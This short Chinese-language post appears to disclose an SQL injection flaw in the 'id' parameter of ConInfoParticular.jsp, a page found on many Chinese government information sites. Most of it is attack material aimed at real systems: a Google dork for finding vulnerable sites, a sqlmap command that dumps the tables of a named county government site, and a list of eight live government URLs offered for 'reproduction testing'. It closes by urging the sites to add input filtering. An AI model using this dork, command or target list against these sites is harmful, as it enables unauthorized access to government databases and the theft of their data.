虽是很简单的注入,但影响的gov很多
1.漏洞存在ConInfoParticular.jsp文件,页面可通过POST、GET方式获取参数id的值,且均未过滤,导致SQL注入漏洞
2.googledork:site:gov.cn inurl:ConInfoParticular.jsp?id
http://74.125.235.191/#newwindow=1&q=site:gov.cn+inurl:ConInfoParticular.jsp%3Fid
google搜索结果:约 153,000 条结果
3.以其中静海县政府信息公开网测试:
http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367
以get方式测试,post方式一样。
获取tables测试:
sqlmap -u "http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367" --dbms "mysql" --tables
4.提供几个站点,方便复现测试:
http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367
http://gk.tjhqqzf.gov.cn/ConInfoParticular.jsp?id=4879
http://info.tjjn.gov.cn/ConInfoParticular.jsp?id=508
http://www.myhack58.com/zfxxgk.bh.gov.cn/ConInfoParticular.jsp?id=1605
http://www.tjnh.gov.cn:7002/ConInfoParticular.jsp?id=2206
http://zwgk.tjhexi.gov.cn:8080/ConInfoParticular.jsp?id=1192
http://gk.tjnk.gov.cn/ConInfoParticular.jsp?id=997
http://xinxigk.baodi.gov.cn/ConInfoParticular.jsp?id=21
………………
应该足够用于复现并体现其通用性了。
赶紧过滤处理下吧